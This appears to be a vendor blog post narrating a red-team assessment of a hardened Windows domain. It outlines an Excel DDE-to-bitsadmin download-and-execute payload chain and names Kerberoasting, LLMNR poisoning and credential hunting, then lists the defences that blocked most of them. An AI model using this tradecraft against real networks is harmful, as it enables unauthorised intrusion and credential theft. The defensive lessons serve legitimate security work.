T’was a Monday morning. A new assessment was about to begin.
I am no fan of Monday mornings, but assessment mornings are pure adrenaline. I woke up a little early that day to double-check if all the assessment infrastructure was up and running. Tea and r/netsec are my morning rituals before leaving home.
On my way to the assessment, I had my Amazon Music (yeah, I know, sue me) tuned to System of a Down radio. It helps me get into the zone. I recommend Aerials; there is something weirdly poetic about that song.
The goal
My goal was straightforward – break into the customer database server without getting caught. I had five days. It was showtime.
It had been a good year. Red teams live and die by their outcomes. And up until then, I had hit nothing but net. There is comfort in the mindset that there is always a way in. I had no reason to believe today would be any different. I was about to learn otherwise.
Getting started
Within an hour, I could remotely control a machine within the organization over the Internet. I had a tried and tested payload that had worked well in the prior months against most perimeter detection solutions.
Excel DDE → Starts CMD → Starts a download lolbin (like bitsadmin) → fetches encrypted payload → load in memory → decrypt payload → execute → Call back.
I was able to cross the first hurdle with ease.
Day 1 – Chasing the keys to the kingdom
I had access to an account that did not have administrative privileges on my machine or, for that matter, anywhere else. I also had no idea where the database server was.
The obvious strategy was to try and compromise the domain. If I could get the keys to the kingdom, then accessing the database server would only be a matter of time, patience, and persistence.
Right off the bat, I executed what many of us consider a lucky charm these days – Kerberoasting
A kerberoastable domain admin meant I had a high likelihood of owning the domain by lunchtime.
So thanks to HarmJ0y’s Powerview script, I had the list of kerberoastable accounts and hashes. Unfortunately, none of them were Domain Admins, Enterprise Admins, or accounts that would allow a possibility to compromise the domain.
My heart sank when I got the list of domain admins – just one.
One domain admin is a rarity. The least I had seen before was five. And five is any day better than one (for a red teamer, that is). I ran a quick check of the domain admin properties, and my heart sank further.
Logon restrictions to the domain controllers only! This meant that there was no chance of finding domain admin exposed credentials anywhere else.
This was going to be more difficult than I thought.
Of the seven kerberoastable accounts, I only managed to crack one.
And as far as I could analyze based on its group memberships and properties, it did not appear to have anything of value. In fact, I could not even reach the machine on which the service was supposedly configured.
I decided to park this route for the time being as it was already past lunchtime on day 1.
The quick hit list
Candidly writing, I was both annoyed and impressed at how the accounts with the tasty privileges were locked down. So next up was my trusty quick hit list:
- Local privilege escalation
- UAC bypass
- Misconfigured paths and services
- LLMNR using Invoke-Inveigh
- GPP
- SMBv1 checks
Nothing. Zilch. Zippo. Nada.
No LLMNR struck me as especially weird. Was I on a sparsely populated subnet? A quick local segment scan showed that Port 135 and 445 were locked down. I could only see the RDP port. And there were about 100 hosts that were live. Maybe I just had to be patient. I decided to keep it running for a while.
Day 2 to 4 – Going Hunting
It was already day 2, and I had nothing to show for my time there.
Though it was time to switch gears and try something else, I could not just go waltzing through the network as it could trip a SIEM rule or the EDR, and I certainly did not want to get caught. Normally, I would take the risk, but experience told me that if someone had locked down the network so well, they knew what they were defending against.
I needed a clear plan of action and have multiple tasks going on at the same time. Here’s what I decided to do:
- Spend some time understanding the environment. That meant digging deep into Active Directory.
- Find the IP address and hostname of the database server.
- Figure out what credentials were required to log in to the database server.
- Find the credentials to the database server (somehow!).
- BloodHound the network without using BloodHound, so I could find privilege hopping points.
Lots to do!
While hunting in Active Directory, I did pick up some interesting targets – Users who could change passwords, modify attributes, create policies, RDP to the server, possible workstation and server administrators, and possible DB administrators.
I also found computers that could potentially be my target customer database servers, thanks to SPN scanning and hostname keyword searches for “db”, “sql” etc.
I decided to hunt for these users on the network and see if there was a way to compromise them. I ran user hunting and session enumeration scripts, but I could not enumerate any sessions on the DC.
NetCease? No way. Just no way. The one thing I had counted on, they took from me.
File servers were always a good target for session enumeration. Everyone connects there. But it was a NAS device that everyone was mapped to. No session enumeration was possible.
I felt like I was facing Gandalf.
Just so you know, if someone kills session enumeration on their network, finding user targets becomes a matter of luck, chance, and brute force. It increases your chances of being detected because you have to expand the footprint of your search.
I was suffering because I did not have rights.
You can still enumerate sessions if you are an administrator on the target machine, but I had no admin privileges.
And to top it off, most of the workstations had blocked WMI and SMB. So even BloodHound would come back empty from workstations.
I also found that the workstation computers had LAPS attributes! Local administrator password reuse was out of the question now.
This meant that even if I serendipitously managed to get local admin access on my machine, the local administrator password was useless to me as I couldn’t use it anywhere else!
Day 5 – Expanding the Search
Last day of the assessment and I was staring at a bunch of dead ends
- No unconstrained delegation.
- No meaningful credentials from LLMNR
- No ASREPRoasting.
- No scope for AdminSDHolder abuses.
- Of all my DB server targets, four were unreachable. The rest did not have default or common passwords.
- No default passwords on any of the popular targets like Tomcat/JBoss/Jenkins that give you code execution.
- Server Admins had a granular password policy of 15 characters so, I couldn’t guess passwords either.
- Accounts for administrative use and regular use were split.
- SMB was blocked from my network location towards a big chunk of the server zone so, running enumeration against the servers was difficult.
- A bunch of users I wanted to compromise were in the protected users group.
I did manage to get administrative access to three UAT servers that had “Domain Users” in the administrator’s group. It seemed like the UAT segment did not have the same rigorous blocks as compared to the production segment.
Two truths and a lie
- At 7:00 pm on day 5, I gave up and called it quits as time was up.
- I went to a bar nearby and had a beer.
- At 5:30 pm on day 5, I got lucky and was able to expand my access to the customer database from the UAT segment by obtaining a backup web.config file that had stored SQL passwords in it.
Looking back
This story is about all the stuff that was done right.
- Machines were patched for exploits and well-known privilege escalation checks.
- Powerful privileged groups had restricted members and several types of logon restrictions were enforced.
- Fine-grained password policies for key users made password guessing a futile strategy.
- Session enumeration was restricted.
- Administrators to critical servers had additional protections (LSASS Protections, Protect Users Group, etc.), making it very difficult to steal credentials.
- Administrative use and regular use was split, reducing the surface of credential exposure.
- Lateral movement paths were blocked for the user segment. Lateral movement between endpoints was nearly impossible. WMI / SMB were blocked. RDP was too risky an option.
- Critical servers were not accessible from all locations.
- Default passwords for applications did not work.
Ultimately, I was up against someone who knew how people like me operate. They didn’t do anything too fancy. They just meticulously removed options from my arsenal. And that’s half of what Active Defense is all about.
- Detect zero-days, APTs, and insider threats
- 10x the detection capabilities with 1/2 the team
- Get started in minutes, fully functional in hours